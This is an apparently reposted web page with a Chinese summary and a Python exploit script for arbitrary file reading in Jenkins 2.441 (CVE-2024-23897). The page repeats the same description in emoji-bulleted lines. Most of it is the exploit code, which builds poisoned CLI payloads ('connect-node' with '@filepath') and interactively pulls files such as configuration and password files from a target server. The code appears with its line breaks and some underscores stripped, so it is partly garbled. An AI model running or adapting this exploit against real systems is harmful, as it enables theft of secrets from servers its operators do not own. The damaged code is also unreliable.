该漏洞利用程序利用了 Jenkins 2.441 版本中的本地文件包含漏洞（CVE-2024-23897），允许攻击者从目标服务器读取任意文件。攻击者可以通过发送精心构造的 HTTP 请求，利用该漏洞读取敏感文件，例如系统配置、密码或其他敏感信息。该漏洞利用程序提供了交互式命令行界面，允许攻击者指定要读取的文件路径，并接收文件内容。

🤩 该漏洞利用程序利用了 Jenkins 2.441 版本中的本地文件包含漏洞（CVE-2024-23897），允许攻击者从目标服务器读取任意文件。

🥳 攻击者可以通过发送精心构造的 HTTP 请求，利用该漏洞读取敏感文件，例如系统配置、密码或其他敏感信息。

😥 该漏洞利用程序提供了交互式命令行界面，允许攻击者指定要读取的文件路径，并接收文件内容。

😔 该漏洞利用程序使用 Python 编写，需要安装 `requests` 和 `argparse` 库。

🧐 该漏洞利用程序适用于 Debian 12（Bookworm）系统上的 Jenkins 2.441 版本。

😱 攻击者可以通过该漏洞获取敏感信息，例如系统配置、密码或其他敏感信息，从而对目标系统造成严重的安全威胁。

😭 建议及时更新 Jenkins 版本以修复该漏洞。

Exploit Title: Jenkins 2.441 - Local File Inclusion# Date: 14/04/2024# Exploit Author: Matisse Beckandt (Backendt)# Vendor Homepage: https://www.jenkins.io/# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip# Version: 2.441# Tested on: Debian 12 (Bookworm)# CVE: CVE-2024-23897from argparse import ArgumentParserfrom requests import Session, post, exceptionsfrom threading import Threadfrom uuid import uuid4from time import sleepfrom re import findallclass Exploit(Thread):def init(self, url: str, identifier: str):Thread.init(self)self.daemon = Trueself.url = urlself.params = {"remoting": "false"}self.identifier = identifierself.stop_thread = Falseself.listen = Falsedef run(self):while not self.stop_thread:if self.listen:self.listen_and_print()def stop(self):self.stop_thread = Truedef receive_next_message(self):self.listen = Truedef wait_for_message(self):while self.listen:sleep(0.5)def print_formatted_output(self, output: str):if "ERROR: No such file" in output:print("File not found.")elif "ERROR: Failed to parse" in output:print("Could not read file.")expression = "No such agent \"(.*)\" exists."results = findall(expression, output)print("\n".join(results))def listen_and_print(self):session = Session()headers = {"Side": "download", "Session": self.identifier}try:response = session.post(self.url, params=self.params, headers=headers)except (exceptions.ConnectTimeout, exceptions.ConnectionError):print("Could not connect to target to setup the listener.")exit(1)self.print_formatted_output(response.text)self.listen = Falsedef send_file_request(self, filepath: str):headers = {"Side": "upload", "Session": self.identifier}payload = get_payload(filepath)try:post(self.url, data=payload, params=self.params, headers=headers, timeout=4)except (exceptions.ConnectTimeout, exceptions.ConnectionError):print("Could not connect to the target to send the request.")exit(1)def read_file(self, filepath: str):self.receive_next_message()sleep(0.1)self.send_file_request(filepath)self.wait_for_message()def get_payload_message(operation_index: int, text: str) -> bytes:text_bytes = bytes(text, "utf-8")text_size = len(text_bytes)text_message = text_size.to_bytes(2) + text_bytesmessage_size = len(text_message)payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_messagereturn payloaddef get_payload(filepath: str) -> bytes:arg_operation = 0start_operation = 3command = get_payload_message(arg_operation, "connect-node")poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")payload = command + poisoned_argument + start_operation.to_bytes(1)return payloaddef start_interactive_file_read(exploit: Exploit):print("Press Ctrl+C to exit")while True:filepath = input("File to download:\n> ")filepath = make_path_absolute(filepath)exploit.receive_next_message()try:exploit.read_file(filepath)except exceptions.ReadTimeout:print("Payload request timed out.")def make_path_absolute(filepath: str) -> str:if not filepath.startswith('/'):return f"/proc/self/cwd/{filepath}"return filepathdef format_target_url(url: str) -> str:if url.endswith('/'):url = url[:-1]return f"{url}/cli"def get_arguments():parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")parser.add_argument("-p", "--path", help="The absolute path of the file to download")return parser.parse_args()def main():args = get_arguments()url = format_target_url(args.url)filepath = args.pathidentifier = str(uuid4())exploit = Exploit(url, identifier)exploit.start()if filepath:filepath = make_path_absolute(filepath)exploit.read_file(filepath)exploit.stop()returntry:start_interactive_file_read(exploit)except KeyboardInterrupt:passprint("\nQuitting")exploit.stop()if name == "main":main()